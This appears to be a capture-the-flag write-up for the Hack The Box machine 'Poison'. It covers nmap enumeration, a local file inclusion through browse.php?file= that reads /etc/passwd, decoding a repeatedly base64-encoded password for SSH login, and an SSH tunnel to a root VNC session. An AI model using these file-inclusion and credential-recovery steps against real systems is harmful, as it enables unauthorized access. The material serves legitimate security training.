Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!
Enumeration
As always, we start with a full nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
sudo nmap -sV -sC -oA initial -p- 10.10.10.84 Nmap scan report for 10.10.10.84 Host is up (0.038s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh -hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9: cd :7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80 /tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP /5 .6.32) |_http-server-header: Apache /2 .4.29 (FreeBSD) PHP /5 .6.32 |_http-title: Site doesn't have a title (text /html ; charset=UTF-8). Service Info: OS: FreeBSD; CPE: cpe: /o :freebsd:freebsd Service detection performed. Please report any incorrect results at https: //nmap .org /submit/ . Nmap done : 1 IP address (1 host up) scanned in 413.45 seconds |
So we have port 80 running a HTTP service and port 22 running SSH.
Browsing to webpage displays the following:
We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
info.php reveals the following:
1
|
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 |
The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:
1
|
Array ( [0] =. [1]; .. [2]; browse.php [3]; index.php; info.php; ini.php; listfiles.php; phpinfo.php; pwdbackup.txt ) |
That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
|
http: //10 .10.10.84 /browse .php? file = /etc/passwd # $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes: /root : /usr/sbin/nologin operator:*:2:5:System &:/: /usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/: /usr/sbin/nologin tty :*:4:65533:Tty Sandbox:/: /usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/: /usr/sbin/nologin games:*:7:13:Games pseudo-user:/: /usr/sbin/nologin news:*:8:8:News Subsystem:/: /usr/sbin/nologin man :*:9:9:Mister Man Pages: /usr/share/man : /usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon: /var/empty : /usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User: /var/spool/clientmqueue : /usr/sbin/nologin mailnull:*:26:26:Sendmail Default User: /var/spool/mqueue : /usr/sbin/nologin bind:*:53:53:Bind Sandbox:/: /usr/sbin/nologin unbound:*:59:59:Unbound DNS Resolver: /var/unbound : /usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo- user: /nonexistent : /usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user: /var/empty : /usr/sbin/nologin _dhcp:*:65:65:dhcp programs: /var/empty : /usr/sbin/nologin uucp:*:66:66:UUCP pseudo- user: /var/spool/uucppublic : /usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner: /nonexistent : /usr/sbin/nologin auditdistd:*:78:77:Auditdistd unprivileged user: /var/empty : /usr/sbin/nologin www:*:80:80:World Wide Web Owner: /nonexistent : /usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged user: /var/empty : /usr/sbin/nologin hast:*:845:845:HAST unprivileged user: /var/empty : /usr/sbin/nologin nobody:*:65534:65534:Unprivileged user: /nonexistent : /usr/sbin/nologin _tss:*:601:601:TrouSerS user: /var/empty : /usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon User: /nonexistent : /usr/sbin/nologin avahi:*:558:558:Avahi Daemon User: /nonexistent : /usr/sbin/nologin cups:*:193:193:Cups Owner: /nonexistent : /usr/sbin/nologin charix:*:1001:1001:charix: /home/charix : /bin/csh |
So our user is probably charix.
Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt
1
2
3
|
This password is secure, it's encoded atleast 13 times .. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo= |
Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key
1
|
Charix!2 #4%6&8(0 |
The only service we’ve seen so far is the SSH service.
Exploitation
ssh 10.10.10.84 -l charix
Password: Charix!2#4%6&8(0
And we’re logged in.
Privilege Escalation
After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.
I do the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
charix@Poison:~ % sockstat -l USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS www httpd 713 3 tcp6 *:80 *:* www httpd 713 4 tcp4 *:80 *:* www httpd 712 3 tcp6 *:80 *:* www httpd 712 4 tcp4 *:80 *:* www httpd 711 3 tcp6 *:80 *:* www httpd 711 4 tcp4 *:80 *:* root sendmail 642 3 tcp4 127.0.0.1:25 *:* www httpd 641 3 tcp6 *:80 *:* www httpd 641 4 tcp4 *:80 *:* www httpd 640 3 tcp6 *:80 *:* www httpd 640 4 tcp4 *:80 *:* www httpd 639 3 tcp6 *:80 *:* www httpd 639 4 tcp4 *:80 *:* www httpd 638 3 tcp6 *:80 *:* www httpd 638 4 tcp4 *:80 *:* www httpd 637 3 tcp6 *:80 *:* www httpd 637 4 tcp4 *:80 *:* root httpd 625 3 tcp6 *:80 *:* root httpd 625 4 tcp4 *:80 *:* root sshd 620 3 tcp6 *:22 *:* root sshd 620 4 tcp4 *:22 *:* root Xvnc 529 0 stream /tmp/ .X11-unix /X1 root Xvnc 529 1 tcp4 127.0.0.1:5901 *:* root Xvnc 529 3 tcp4 127.0.0.1:5801 *:* root syslogd 390 4 dgram /var/run/log root syslogd 390 5 dgram /var/run/logpriv root syslogd 390 6 udp6 *:514 *:* root syslogd 390 7 udp4 *:514 *:* root devd 319 4 stream /var/run/devd .pipe root devd 319 5 seqpac /var/run/devd .seqpacket.pipe |
I used http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.
There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:
1
|
ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84 |
Using vncviewer, we can get access to the desktop of the root user, which contains the key:
1
2
|
vncviewer - passwd secret Use localhost:5901 to get access. |